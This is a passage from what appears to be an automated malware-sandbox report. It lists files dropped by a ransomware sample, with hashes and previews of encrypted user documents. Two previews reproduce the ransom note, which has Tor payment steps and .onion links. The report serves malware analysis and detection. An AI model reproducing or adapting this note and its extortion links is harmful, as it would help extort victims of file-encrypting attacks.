                                                                                                                                                      Preview: ....p.,.6...\1..\..3.(...\..je............E...B....a*..DYHA.7J.d...b8.j...2.....eKc.L.%.:.vS@..a|.BH$Ff~...?.oU6rz.:........W.k%.. ....&.g".D..._.bH..a{....b..(K,....f...m.....|b.. P;.T7.<.o..{........h.i..<..b ....0%......An..Q..zh....6...|........D....Z._.&..r..2. if1.?6t..={....A.....L......T......._!....IY.S.(9...AL.._.....-......J.G}x......'v..@0Q.......,....>.h......XyZ.b.9k....Y0.._..J.....&..l...2.......{H.!.tELl@.._....G.Wdg.6..g..d......U..5.t......:6,#.W^.v..1D.g...&s.L;.3...^..[.1jZ.Is..@.[....-b.......0r|.-.....Ev1..m>{.4._t.v.jq.....2f.....i!!p..gz...l.M...i...0...e.RJ/.T........c2b..3.)R....t....v&2.?.0.1....D..:...h8...%F.#.....,A.U...3...y..."A.A..&.`n....w.........<.....+.=-.l..u......$..4.....:....}.jl...R.... N.M3......6o...Lb..{JS..YW.l..a..L?P^N>h....ZK..QG.j_....*....^#J.p.......:.H........C.....#.....Z&)....ql..y.....g....o*.~.m..X3Z...!O...8O...-..G.&f6g.\.j{/.&k>&...g._]f....).t.}..Xd..Y...$."...ab.FU...TI$.1.N...L.).
                                                                                                                                                      C:\Users\user\Documents\NVWZAPQSQL\GRXZDKKVDB.xlsx
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.005287996559887
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:ozz3mR7Keem6Zk39qL+PbV3zCwgck38sW:oze7KTm6Z+U+pzTENW
                                                                                                                                                      MD5:D0609EC16BDD6AC8856638FE2A72D3CE
                                                                                                                                                      SHA1:C9E8F9B6DBD56FB5BA7D431ECF9DC8EE6E4FE02E
                                                                                                                                                      SHA-256:D2FFD0640371F6FBC12365E1E8E24F8E336479B21FF16652A2D44302A9D11D23
                                                                                                                                                      SHA-512:8CC0457735A0D47A58273F973F074EC30E8EBAE9B6A94CBE392BEE740333C5B7349CD3AAD18436E8255E5C9FBF5F9601DE86A509176A47D3191BF79A3F1DF947
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: H$....L..k.w.,PP.....i..k....:.......0...x......\...x|o...R<......h.P.4:..d.P.......s.L....u...6._..V.O.*(.3..l^..T^U4...Yu.%.$.$..E.......(g...;A9....[..-..w..[....L.d4.qZ.9..S..0...yj,.E...e..... .n...v.....&.m.M3g....39......0.'`{..2.I..b.m...Z...;US.o.89.1...|:..#..E..\.. ....\....-....2..c..V..D.*.9Oa..1.H2.;..guc.Z..cU.N....uu.3..M..a.9...P..D..]DE.m.*...JD......".c...~.K:.k...??pK...1r...x...?.z..j.....)HG......`1_..?H.....n.....q~i...U!0.b..VA:....O.z.al"...i/..%..)&.qF..3.......=X....n..(VY....9..@sS...<x.......]T....=r3.XV..}..q..P..*Ya.P.SbU3..L..GOHzd.W.IA..X.N3..GJ@r#.Z....}DF.......X.X......9QG.3...DIg'....g..j.0...?..M>......W(l?..5.m...!lw..[.}F1.S.I......."$.E..K..{......S..-n:....I.)`.....!.Ds.....|..k.x5.z.e]....&.....":%J.......7\,..yg.3..[3...<.....X-......}a?.2....H......~4._.O/F_..Op.d....]e..D..........'FT.u.i.2.X.*...4m:.n....FJ.X..3...fzT=3M3...m....W.r.t.....="ew...V.7.O...V.....O<..B\g....2KG.lL...C...zYQ
                                                                                                                                                      C:\Users\user\Documents\NVWZAPQSQL\NVWZAPQSQL.docx
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.009188114573667
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:aVfgmfpxhme1aVUzt7bKwiKWAtglLt1zCwgck383:QIQpx5zVmrAtAzTEE
                                                                                                                                                      MD5:AD30C0786C4F74C39B8EB6E030012C8E
                                                                                                                                                      SHA1:07FABAAC7DB09B3050C8256C204CD187B62301F0
                                                                                                                                                      SHA-256:1DC7A18CE2B298172B029000A409A184A13E624126DC029177E7A01BF05040E0
                                                                                                                                                      SHA-512:616A1343045FA517A6B0DBF5DE4AC4DF3626DA6C28C8FC2224E8CDB00700C60F90D969A53756D03A25FF149B4D6ADB7AAB09D5BA383C53CA2C964ED145EDAF9A
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .$..[Th...`...E.9..V#..1...*M........u..uLa...A..(...D..hN.:W.-..>.uH.GR&.;.I....QP.h#..._.....>..z..$.V..!.........r.&....A...Z..h....!D....7..g].r.._>5..B....WC.Tf4n..[..Y.Y.Tqs.S...Y....d.H~/...[...(...0.2[==P......v.X..V.|..R!..`}......U.FgYv.g.S_.....G.`~.%.abH..r.#@.........W...nA..D.V].`..R./...I....)..\..E...ML*.v.:..ZS.2..i%QG...e..o7.F.q.B..'@b.A.......5(.Q...{.i.I.X....&..z<9...S..w;..4.....mFA(R-,.E..|...U..js..Q../o..96M.^....".-(..4a,..c...-...j.t..g....p.....q..^........&...W....{...6K.`.B[n.)^.|u..Qj-......C*Ij.=xkJ.....reoy.gb..*yW.Y..l..e9..S........!6.....Qq.K...R...R..n._c...Y....r{zm...i...N2.....gh..1$..a(.\.@.;.....I;...|.XCv........r....5.........q\.JL':.B....h..}...A.0*bQ#]...~..E.[.;".....K'..).Q....\.F"T..+.y.!..!n.<^..N....Qt1D\L.W.t...j.v..o..VF.oW..Y....Z\.&..]...A.m..$..a.oNP_.<..z........C).3lg(.|.$.{..&..*V.a...u........-....3V.l...=.....d.D.*..d'.>...'G.....a.-.J...}...T.....5..1.......}.a...>....
                                                                                                                                                      C:\Users\user\Documents\NVWZAPQSQL\PALRGUCVEH.pdf
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.006879297627094
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:wWwcFyGAwCtK35WQjWKaujrH/zCwgck38RE:OwCtKJWQjWRuHzTEcE
                                                                                                                                                      MD5:D8432CCA7D35B586CA555CDB761B83D8
                                                                                                                                                      SHA1:37522225A2DD5300E8465B441A7B8E07D6B83389
                                                                                                                                                      SHA-256:280312661FAE57AF24028B842B5BBE5113DCA3E0CF10F4714774E210F3047C48
                                                                                                                                                      SHA-512:3DD1A4B870E17F2590FFB9DD15EE6A5E5D9D414545E7C1312967B74DEABE6BE8F312BA7B03DBDDFFB5EBAE5814CFA1827750B6AA97F766003CEF9BA81652A167
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: wv.:P..Mi........{;$..>.O.../..HwAin.(%.C].j..j..@$.W]..UV/....h........C..7...O..S.7./.z.s.~.....d..J.x.FP.U..._k....;.2..@&n..)v6...^cL.J&....l.....m.NT~2MM..../Dso...D.K.H..KUx.'rl..m..@..T...L..B.-.......VF.sX.O...J/G..|.......k."c.8...orn..fF.eh...."f...?M...2.Eg.}..*.pG..]..\2].K.Z.R.e...GnR.......x..o 9....s..*...6.....|E.%...o.-..T>....H..c>_"bY].p..'^.......og...5....B0.$....eq...,...FNB.hj.0=.5...|...`.#.o%.SG=U..i<.x.O.....|....._T...1...|.........H....~...C%x^r.'n..40Z9Xc.,.a..%.SnZ.|..ld.[._Z&Q.o=.|._..l%.W.Ru..C.......6.<q..1.vY.Z.3<.....[H.2n...IG.[.....z.......f5;f.q.E.*7x.Q4J.q...F.....l..5,.1........=..i..&....`..$?y.DV.|...b...G7,....Zvy....3&\#....%..4.O.....7J}.y.#.p.I....\.:......i...N...x.&.*.xR.R...c.y.1.X..>F[#...?..^.?.....x`3.l..FS.g..+I....z..k.&...&.....tA...m.F.. i...p...Ol.LR-sF..5..D..GY..1./.[._]O._.D..;.&...|.Eh...4.@k..i`..R_!N3...._..n.Q.m..`..x.8......i.`...DO..I[.4.{P.....,.B..bpKf......H......:
                                                                                                                                                      C:\Users\user\Documents\NVWZAPQSQL\read-me.txt
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1440
                                                                                                                                                      Entropy (8bit):4.671361883788439
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:TyXWIBdatU+fZe1xzK8sevWAVgKTaCB7RZ0cHYIgtyUzn:Tl9U+fZe1xzCwgck38m
                                                                                                                                                      MD5:755028F7946D7FD0DF47A1AD5961143A
                                                                                                                                                      SHA1:89FF5F39E0E019A2C2068AE638C724711BABEE2D
                                                                                                                                                      SHA-256:A60B3DCDD12428D4683AD9E0434DDB915A9FDAE3DE6D5587D2FDA437BE7770F8
                                                                                                                                                      SHA-512:968C15F6358F2EDF5A47D842EEEB6D3B31BFEEEC5AE308F0C221FEB0648C44CFD1F64C6868DABEB5103D17149726921DEFF964A60213E05BBFE410FA05796957
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: All your files are Encrypted!..For data recovery needs decryptor...How to buy decryptor:..----------------------------------------------------------------------------------------....| 1. Download Tor browser - https://www.torproject.org/ and install it.....| 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV.. ..| 3. Create Ticket....----------------------------------------------------------------------------------------....Note! This link is available via Tor Browser only.....------------------------------------------------------------..or..http://helpqvrg3cc5mvb3.onion/....Your ID.......67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 3
                                                                                                                                                      C:\Users\user\Documents\PALRGUCVEH.mp3
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.004304278821183
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:Irw7LT5lLMyocrLo/+Ucxac9y/zCwgck38o:kwfT7toT/cxac9uzTEL
                                                                                                                                                      MD5:2A5F11B1FE9BC74B46B432C5CFC04456
                                                                                                                                                      SHA1:6752123968674EE1B262C2B67E24596720773E64
                                                                                                                                                      SHA-256:70D49BE1B958A4A0CED6EAC51382F378308E9BE5692AA53142F0B48C242546EF
                                                                                                                                                      SHA-512:F2B3AF3768FD8C3191664AE47F34C095B5838D94C7B80C859992AC1AB0C189F59E9AB764F6AC15D3480788301ACFE281683D098A3DD784DDF9FB08C1A146954E
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: /..s..L|.....rj.%.8eyKe5.,....+ezD.@....c....,..9...E.w.h..~:..%h3V^r.....G/.f..'.&...CBB....o.mQ.. .&Z...>..^...:.9.)._.d....i..>'.W...cF.SY......b.3#.E8..vP.[.(.mm.IX._wBv.3.s1t...;..%....}fE..g....R[Z..<(.M..JI*&>.............^.{'.i.oL.YA........S.brl]S..6+....\.....hCG.;*W.UV..?{...d...H<.F..1~..l"..S.(`.&%..f.JA....}...lj.3..Lgh)..d........Xk..m......S\X...O..^e..l-.....lJq...Bi&u...QW ......C.~hV..!.."..~.:w.R}.r.}...0.....j.......W"}...9CM..h.UU&F.......S..8L...E....:s{..Cf/...V.J....d...D.m<.g!/...H.b.k_|...Z.......8.._.10W'..).....x&#.I..D........T.'Cf..K._..!.W....}....y7#.....%..1E......{.....N.z....F7............q.6..mI!.j...v_....?i!..1......~{6..Z..Z5....g..k ../P.....KK..o,.W.b.a...$..n.....R....X.YL.Kg.S]u....2...*.....zvaCl{..jbq.v|...K.....7..i......K....Z.......q...\.[vj .2.[.|...U..`V..5u@.............u.Z<...7.p......h......Q=6LC......r...y.`.....y8.s.bXa......+)T........x.&.'....R.O...5.....0RU.5v......CS.'...r.
                                                                                                                                                      C:\Users\user\Documents\PALRGUCVEH.pdf
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.003924758281818
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:FFp2O7/Ir3hFNHU0tCsLLOizCwgck384U:pvIjh1tbnzTENU
                                                                                                                                                      MD5:06E2AB2FDFA3EC69EEFBCED80C6E4E61
                                                                                                                                                      SHA1:8D45C42E88CB7E5C34E5D099B2A6D2534A525E5F
                                                                                                                                                      SHA-256:5587E4EBB7BB086877E73E228BFF9C4B12066090E88D0FFC96AD5272E2C90C60
                                                                                                                                                      SHA-512:0FFE6B4C9644182B9B05FE9EF39850EF465EE563748435E5A865B7A057EE5A4DD36A1640446631CB8717F1EF955D969724E34814171AD1EC0F0045F10AC8C667
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .$>%..R.l...dA[.b.@.w..Y.....d.Q.k.h.Y....Rd...+..EU..2R~..\.L..y...j~\..cF........B,L.....I..^.-O.e..u..]Z....?...d/,k.y.B.|.&..ssC.[.3..g.u...#.}...g.`.P.B.9..>H.%)..!]?.|5..+n. wK7...:.3e.M.)%....3[.BKH6+...f..Y..{~._.r..... ..1.,.....#A...%.......^.D.<x.,.;o).U.U}k&a....V..D.&..W._DB_.....r+aUT"..9..\z..1..(....{.W..&.W...,Y.B..>x.Yd._.|...d.N.N./~|.*.L...P...Ow..(...M'...-/.\.-...$1.]...y.[....MhX...*...4Eq..@..x.b.Z.P2....~nlOz@.Ad(.8(j.....!.$.....#.!6;.{8.>.>.z@.....U"Bfa......h9..#z.L..7=._.p...AK.Y.>.k7..0....Y..C.!}...J..|u.?..]..?.c..4...].VZ!...,8..M.s..8.*.@U..;....tR@.A!\]9.....&q.B.H..0-i<.tdc....z..E...r....{.Ai..D.0.G.4..a..1...@z....1.."oP..Y.).....&r...y.A.W`V.....mR...j.GUd......./>..n.1...H.)..sO...*...<.pPA..} 3R..ah.<.Z.q....4-..ra...+..+.....|......d..:.q.....P.8Cqdc.H.IXv....$....~n.....M."|....];..I...>U...S)..~.c.....<......".bZ..d..=?.s.mIx.X...9.!.G..y..s.1..f?0..0.t.s.V=].3...S....c..+@=.)=.>."p...L..d.f.....L"..
                                                                                                                                                      C:\Users\user\Documents\desktop.ini
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1360
                                                                                                                                                      Entropy (8bit):6.24899007980337
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:XUrLnhSHcw/zxxzWktfMmSiozK8sevWAVgKTaCB7RZ0cHYIgtyUzA:XUr7qcwLxxtMmS7zCwgck38h
                                                                                                                                                      MD5:D69E8FF1EC9FC737211FDDF6C3282155
                                                                                                                                                      SHA1:6B220843AF06140E541ABDA5F409A9D368DCE20C
                                                                                                                                                      SHA-256:344EE367C7BC0270B6E4F8BC93EC1031CE334BBC1EC9A619649D0351299B1535
                                                                                                                                                      SHA-512:A011EA43277F4A4964BFDA5916D11F35B8B38F5D8B928EC8C54EE199BD604B8CB1E47148ED9D09EA48815ED766757116D21BDECDCB8728DE33D4AEE435037BC9
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .yw:MA..'...A.t.b.z...2.'...=.e.?......q.X....0zz]0V..._6....i.N..0Q.fM.%`...WJ ...rk....qK.w.z%gs.9!.bFt.m{(c.U....u3.J..,....<KX.rM..fo..*....L.c.b...[.q...._../.")>.}|......s(M..P...._#.....+.h..u.g..ip.{.....[..6...P"..|l|..0L..Lua...5...............5...i7..c..Z<.$lO..C..-.k)..n._8..c&....`{...9xS.....g.N..}o)..$.r~..[..@i../.....5...7...W..wTP....... ..xZ.uh.i..Y....X.z....t..]!...ZP!.T.4.'9.3c....%g.'..,.c.<..>...W....... ..(...*c.L.G.......k<\.{@V...s.........aD..Vr......*(c.q...m...z.bS..}Y..B.k.1tn.U.s67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4
                                                                                                                                                      C:\Users\user\Documents\read-me.txt
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1440
                                                                                                                                                      Entropy (8bit):4.671361883788439
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:TyXWIBdatU+fZe1xzK8sevWAVgKTaCB7RZ0cHYIgtyUzn:Tl9U+fZe1xzCwgck38m
                                                                                                                                                      MD5:755028F7946D7FD0DF47A1AD5961143A
                                                                                                                                                      SHA1:89FF5F39E0E019A2C2068AE638C724711BABEE2D
                                                                                                                                                      SHA-256:A60B3DCDD12428D4683AD9E0434DDB915A9FDAE3DE6D5587D2FDA437BE7770F8
                                                                                                                                                      SHA-512:968C15F6358F2EDF5A47D842EEEB6D3B31BFEEEC5AE308F0C221FEB0648C44CFD1F64C6868DABEB5103D17149726921DEFF964A60213E05BBFE410FA05796957
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: All your files are Encrypted!..For data recovery needs decryptor...How to buy decryptor:..----------------------------------------------------------------------------------------....| 1. Download Tor browser - https://www.torproject.org/ and install it.....| 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV.. ..| 3. Create Ticket....----------------------------------------------------------------------------------------....Note! This link is available via Tor Browser only.....------------------------------------------------------------..or..http://helpqvrg3cc5mvb3.onion/....Your ID.......67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 3
                                                                                                                                                      C:\Users\user\Downloads\BJZFPPWAPT.png
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.005701857078571
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:FgqInFXFgEJGXdmPV/KABv+szCwgck38h:6qInFX/JKmPV/1dRzTE+
                                                                                                                                                      MD5:FEABE3D2BEFFD262809412A654428346
                                                                                                                                                      SHA1:A9E5DCD98AABBF42477EFB721BDCF5C16F00FB55
                                                                                                                                                      SHA-256:3D75B9A97BB62F522A0BEB6CFCB906ABD12196C4475EFBAA79C7429CC6983CE2
                                                                                                                                                      SHA-512:BE347C584B97AD02DFEF38A05C7D7A54E4EEF9EA170A9057434C7B72BB14EE9AC515C93DA8AF197617D191361B86C11C23A8A49BEE3FDD973996CEE4B447E60A
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ..4....19Zc.[..ms.D_=..W.^.SLLhX.a.>......9X{..ks...O..P.*...2<w5i3....4o...P^...g.M.J'...G..P.(2...m....tZc...x.H..~.'/ho..91,......|.....e..rtE..[(..g.t..Q......(... ..y.G....rt.6.}....q.S.e<...O..q...q.m....X!.Oz.K|.....R\0u.)..K.R..;"Z.%B:.....R7........}$...=.J.......S..J...au.Q...>.*.a..{^ .i1...'9.....#...f.3..}!.6..*v.p.*.....41|`J.....1u..U.7....LCO.h6.=^.9P.aI.(. `.w;......_.[.tni.....C..H.E}\.$.8Le..TO.....<....jNkf.K)....)....M.7.h.$.G...Z. #a.mxx...p..o$....;z..T.....&&3...]..|*.u,.........m....!"e.....q..%.*....~.`..$......^..%.R.O...........Vf;..>g...f.%~.......G..[t...KU.... .]d(3.%>n!{.zn...3....3#`.!..X.[.&.n.......Q.Y.]#.Xt..."B.WB..........N....}...a..0.]7.AlO4...u.E.0A...&....`,..'n.qQ...{...`..PtG..N.....a...p.^G0.B.].S.o...>....z.....^.C[{....5zT...X........T&....QD5P....X..^%..D{w\)..o.....G#..!tJ..1.W."B.....W...%h8-....YQ.........lKs:..a...q...?....t.....5G..s..%IW.q+$[8...o.......S.....t..7...rn.|.c..(.)..kIGc.n.R.
                                                                                                                                                      C:\Users\user\Downloads\BJZFPPWAPT.png.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.005701857078571
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:FgqInFXFgEJGXdmPV/KABv+szCwgck38h:6qInFX/JKmPV/1dRzTE+
                                                                                                                                                      MD5:FEABE3D2BEFFD262809412A654428346
                                                                                                                                                      SHA1:A9E5DCD98AABBF42477EFB721BDCF5C16F00FB55
                                                                                                                                                      SHA-256:3D75B9A97BB62F522A0BEB6CFCB906ABD12196C4475EFBAA79C7429CC6983CE2
                                                                                                                                                      SHA-512:BE347C584B97AD02DFEF38A05C7D7A54E4EEF9EA170A9057434C7B72BB14EE9AC515C93DA8AF197617D191361B86C11C23A8A49BEE3FDD973996CEE4B447E60A
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ..4....19Zc.[..ms.D_=..W.^.SLLhX.a.>......9X{..ks...O..P.*...2<w5i3....4o...P^...g.M.J'...G..P.(2...m....tZc...x.H..~.'/ho..91,......|.....e..rtE..[(..g.t..Q......(... ..y.G....rt.6.}....q.S.e<...O..q...q.m....X!.Oz.K|.....R\0u.)..K.R..;"Z.%B:.....R7........}$...=.J.......S..J...au.Q...>.*.a..{^ .i1...'9.....#...f.3..}!.6..*v.p.*.....41|`J.....1u..U.7....LCO.h6.=^.9P.aI.(. `.w;......_.[.tni.....C..H.E}\.$.8Le..TO.....<....jNkf.K)....)....M.7.h.$.G...Z. #a.mxx...p..o$....;z..T.....&&3...]..|*.u,.........m....!"e.....q..%.*....~.`..$......^..%.R.O...........Vf;..>g...f.%~.......G..[t...KU.... .]d(3.%>n!{.zn...3....3#`.!..X.[.&.n.......Q.Y.]#.Xt..."B.WB..........N....}...a..0.]7.AlO4...u.E.0A...&....`,..'n.qQ...{...`..PtG..N.....a...p.^G0.B.].S.o...>....z.....^.C[{....5zT...X........T&....QD5P....X..^%..D{w\)..o.....G#..!tJ..1.W."B.....W...%h8-....YQ.........lKs:..a...q...?....t.....5G..s..%IW.q+$[8...o.......S.....t..7...rn.|.c..(.)..kIGc.n.R.
                                                                                                                                                      C:\Users\user\Downloads\EEGWXUHVUG.docx
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.007812180210224
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:4fD2PRPw+twTEuhbjQYaBYxLzCwgck38nBU:4C1TwJBCBYzTEmBU
                                                                                                                                                      MD5:1A5B9AA040C4F8DACC05C049192EB2AF
                                                                                                                                                      SHA1:5B6FBAD4096F00BDC504DC470E992617D5C856D7
                                                                                                                                                      SHA-256:F8907D0BE7B5A527CFEF0D93C0D46B91B1FEA86FD7A1623B71D9385F32148608
                                                                                                                                                      SHA-512:CFB4414A6FEA46A084C3B9DDA79992B991125A8F042FC014A8C8D276674E6EBD96AF4576429A11B80871CA3F05F7E9B1A5897506A433DBAB7315AC6BE9A943B8
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: <._...E=.@.h'|@.QP....>.^.....Z.c.%...$....A...E..rN.K..K..%.\...g.lm6..C?...+c.....F9X.+.RD....Sx........X.mUW...7...Z..q....~.3%.?.O...........C....`.rtF.A7..,.Qt.kw...X....j`.NC....u.h..NB..t.g.(..<t.rQ.j...P.#{.?BU..`.RH..7...0.n...9..H.........M..v.i....u...y....o.Y....X..X..c..T.=.../.f.....r.#.[.G..:..g~{....C.0^e[.cQ...u...u%S.=.....{..#e.V9......[S...Z.].v.g.....'..x..8.3A.....7MH....#...A...P.6C..Eg..7L...<..T,...~Am+O.-.J......DL.7....88..<q=...............C...c....I..h@Cpk.p-QzIT..m..H..X.s.."H.6|.a.]e.$^.{h.7........sN.h`3`Z.9....9.....H........WcM.xc...W.-R..p.#u...N....FE....M.P.LT.5....i.<.l.3..F..;%....y.Q:...I.R....5...k...3).....H)5.e.,I...@....[#..0....h..Z.....5...._y{b....8..k.+... ![!:.....N.V.M&r..#.w...u..J.=S.K..@cTs..e..0C...c..X~0rw....P.q.......7...W...^$.c....<...2..8.........v.-..k.I.\...7.V?...G*+]{.;....s.A...T..Qz.'._(.......3. |...6Z...6].Z+9nW.5#....A.7,.:. ..........|..1.q7pYad..\.w............B.K.
                                                                                                                                                      C:\Users\user\Downloads\EEGWXUHVUG.docx.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.007812180210224
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:4fD2PRPw+twTEuhbjQYaBYxLzCwgck38nBU:4C1TwJBCBYzTEmBU
                                                                                                                                                      MD5:1A5B9AA040C4F8DACC05C049192EB2AF
                                                                                                                                                      SHA1:5B6FBAD4096F00BDC504DC470E992617D5C856D7
                                                                                                                                                      SHA-256:F8907D0BE7B5A527CFEF0D93C0D46B91B1FEA86FD7A1623B71D9385F32148608
                                                                                                                                                      SHA-512:CFB4414A6FEA46A084C3B9DDA79992B991125A8F042FC014A8C8D276674E6EBD96AF4576429A11B80871CA3F05F7E9B1A5897506A433DBAB7315AC6BE9A943B8
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: <._...E=.@.h'|@.QP....>.^.....Z.c.%...$....A...E..rN.K..K..%.\...g.lm6..C?...+c.....F9X.+.RD....Sx........X.mUW...7...Z..q....~.3%.?.O...........C....`.rtF.A7..,.Qt.kw...X....j`.NC....u.h..NB..t.g.(..<t.rQ.j...P.#{.?BU..`.RH..7...0.n...9..H.........M..v.i....u...y....o.Y....X..X..c..T.=.../.f.....r.#.[.G..:..g~{....C.0^e[.cQ...u...u%S.=.....{..#e.V9......[S...Z.].v.g.....'..x..8.3A.....7MH....#...A...P.6C..Eg..7L...<..T,...~Am+O.-.J......DL.7....88..<q=...............C...c....I..h@Cpk.p-QzIT..m..H..X.s.."H.6|.a.]e.$^.{h.7........sN.h`3`Z.9....9.....H........WcM.xc...W.-R..p.#u...N....FE....M.P.LT.5....i.<.l.3..F..;%....y.Q:...I.R....5...k...3).....H)5.e.,I...@....[#..0....h..Z.....5...._y{b....8..k.+... ![!:.....N.V.M&r..#.w...u..J.=S.K..@cTs..e..0C...c..X~0rw....P.q.......7...W...^$.c....<...2..8.........v.-..k.I.\...7.V?...G*+]{.;....s.A...T..Qz.'._(.......3. |...6Z...6].Z+9nW.5#....A.7,.:. ..........|..1.q7pYad..\.w............B.K.
                                                                                                                                                      C:\Users\user\Downloads\EFOYFBOLXA.pdf
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.014712898055641
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:9/9cYBcgvmKB5cekPt3OKYa6qDyqIx/zCwgck38kI:UYSgvhBGe4tpYJVJzTEFI
                                                                                                                                                      MD5:A1E562FF299252B16F49BB5761C04B2F
                                                                                                                                                      SHA1:195C0B7EBF0BEAF2BB344454F9A5E904DB9A1AE5
                                                                                                                                                      SHA-256:C5878440854AF0B7CF21F1354FF4AFD48C8E33DECB697E17286BEB853FA90043
